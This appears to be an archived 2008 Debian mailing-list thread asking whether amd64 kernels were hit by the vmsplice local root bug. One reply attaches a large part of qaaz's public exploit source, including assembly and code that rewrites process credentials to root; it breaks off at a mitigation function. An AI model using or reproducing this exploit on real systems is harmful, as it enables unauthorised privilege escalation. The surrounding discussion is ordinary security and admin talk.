DG965ss

2008-02-10 Thread Dr. Helmut G. Enders

My problems with corrupt apt-get .deb files
went away when I upgraded to SID.

Now it seems that everything works as expected.

Thanks for your help.

Helmut




--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]


--
CS Cybernetic Systems GmbH
Markgrafenstr. 19
D-95100 Selb
Germany
--
Dr. Helmut G. Enders
Phone: +49 9287 9929 11
Fax:   +49 9287 9929 32
Email: [EMAIL PROTECTED]
--
COO:  Dipl.-Kfm.Univ. Hiltrud Enders
County Court: Hof HRB 1968
VAT ID:   DE 154589625
--





Re: Root exploit

2008-02-10 Thread Alex Samad
On Mon, Feb 11, 2008 at 02:02:40PM +1100, Alex Samad wrote:
> On Mon, Feb 11, 2008 at 01:21:42AM +, Stephen Gran wrote:
> > This one time, at band camp, Alex Samad said:
> > > Hi
> > > 
> > > http://it.slashdot.org/article.pl?sid=08/02/10/2011257 & 
> > > http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464953
> > > 
> > > is the amd64 kernel susceptible to this ?
> > 
> > Yes, expect a DSA soon.
> there was a stop the exploit in the bug report, but it doesn't seem to be 
> available any more, but there was a question about it being only i386
from the debian-user list (attached code to stop the exploit)


> 
> 
> > -- 
> >  -
> > |   ,''`.Stephen Gran |
> > |  : :' :[EMAIL PROTECTED] |
> > |  `. `'Debian user, admin, and developer |
> > |`- http://www.debian.org |
> >  -
> 
> 
> 
> -- 
> Baseball is a skilled game.  It's America's game - it, and high taxes.
>   -- The Best of Will Rogers



-- 
"This case has had full analyzation and has been looked at a lot.  I understand 
the emotionality of death penalty cases."

- George W. Bush
06/23/2000
Seattle Post-Intelligencer
/*
 * Linux vmsplice Local Root Exploit
 * By qaaz
 *
 * Linux 2.6.17 - 2.6.24.1
 */

#define _GNU_SOURCE
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#define __KERNEL__
#include 

#define PIPE_BUFFERS16
#define PG_compound 14
#define uintunsigned int
#define static_inline   static inline __attribute__((always_inline))
#define STACK(x)(x + sizeof(x) - 40)

struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};

voidexit_code();
charexit_stack[1024 * 1024];

voiddie(char *msg, int err)
{
printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice   316
#endif

#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246

static_inline
voidexit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void *  get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice   278
#endif

#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246

static_inline
voidexit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void *  get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}

#else
#error "unsupported arch"
#endif

#if defined (_syscall4)
#define __NR__vmsplice  __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl)  syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

voidkernel_code()
{
int i;
uint*p = get_current();

for (i = 0; i < 1024-13; i++) {
if (p[0] == uid && p[1] == uid &&
p[2] == uid && p[3] == uid &&
p[4] == gid && p[5] == gid &&
p[6] == gid && p[7] == gid) {
p[0] = p[1] = p[2] = p[3] = 0;
p[4] = p[5] = p[6] = p[7] = 0;
p = (uint *) ((char *)(p + 8) + sizeof(void *));
p[0] = p[1] = p[2] = ~0;
break;
}
p++;
}   

exit_kernel();
}

voidde_exploit()
{
  char line[4096];
  FILE* ksyms = fopen("/proc/kallsyms", "r");
  size_t address = 0;

Re: Root exploit

2008-02-10 Thread Alex Samad
On Mon, Feb 11, 2008 at 01:21:42AM +, Stephen Gran wrote:
> This one time, at band camp, Alex Samad said:
> > Hi
> > 
> > http://it.slashdot.org/article.pl?sid=08/02/10/2011257 & 
> > http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464953
> > 
> > is the amd64 kernel susceptible to this ?
> 
> Yes, expect a DSA soon.
there was a stop the exploit in the bug report, but it doesn't seem to be 
available any more, but there was a question about it being only i386


> -- 
>  -
> |   ,''`.Stephen Gran |
> |  : :' :[EMAIL PROTECTED] |
> |  `. `'Debian user, admin, and developer |
> |`- http://www.debian.org |
>  -



-- 
Baseball is a skilled game.  It's America's game - it, and high taxes.
-- The Best of Will Rogers




Re: Root exploit

2008-02-10 Thread Stephen Gran
This one time, at band camp, Alex Samad said:
> Hi
> 
> http://it.slashdot.org/article.pl?sid=08/02/10/2011257 & 
> http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464953
> 
> is the amd64 kernel susceptible to this ?

Yes, expect a DSA soon.
-- 
 -
|   ,''`.Stephen Gran |
|  : :' :[EMAIL PROTECTED] |
|  `. `'Debian user, admin, and developer |
|`- http://www.debian.org |
 -




Re: Root exploit

2008-02-10 Thread Leonardo Baldelli
From 2.6.17 to 2.6.24.1, where vmsplice() is implemented.

I tested the exploit in Debian testing; kernel 2.6.23.14 is
vulnerable.

Sorry, my English sucks.

Bye

/* Spanish */

Versions 2.6.17 to 2.6.24.1 are vulnerable; for other versions in which
vmsplice() has not been implemented, I don't know whether they are... from
what I read, that was it.

/*  */

Regards



On Mon, 11 Feb 2008 09:18:49 +1100
Alex Samad <[EMAIL PROTECTED]> wrote:

> Hi
> 
> http://it.slashdot.org/article.pl?sid=08/02/10/2011257 & 
> http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464953
> 
> is the amd64 kernel susceptible to this ?
> 



Root exploit

2008-02-10 Thread Alex Samad
Hi

http://it.slashdot.org/article.pl?sid=08/02/10/2011257 & 
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464953

is the amd64 kernel susceptible to this ?

-- 
"I hope I--I don't want to sound like I've made no mistakes. I'm confident I 
have. I just haven't--you just put me under the spot here, and maybe I'm not as 
quick on my feet as I should be in coming up with one."

- George W. Bush
04/03/2004
Washington, DC
Press Conference - after being asked to name the biggest mistake he had made

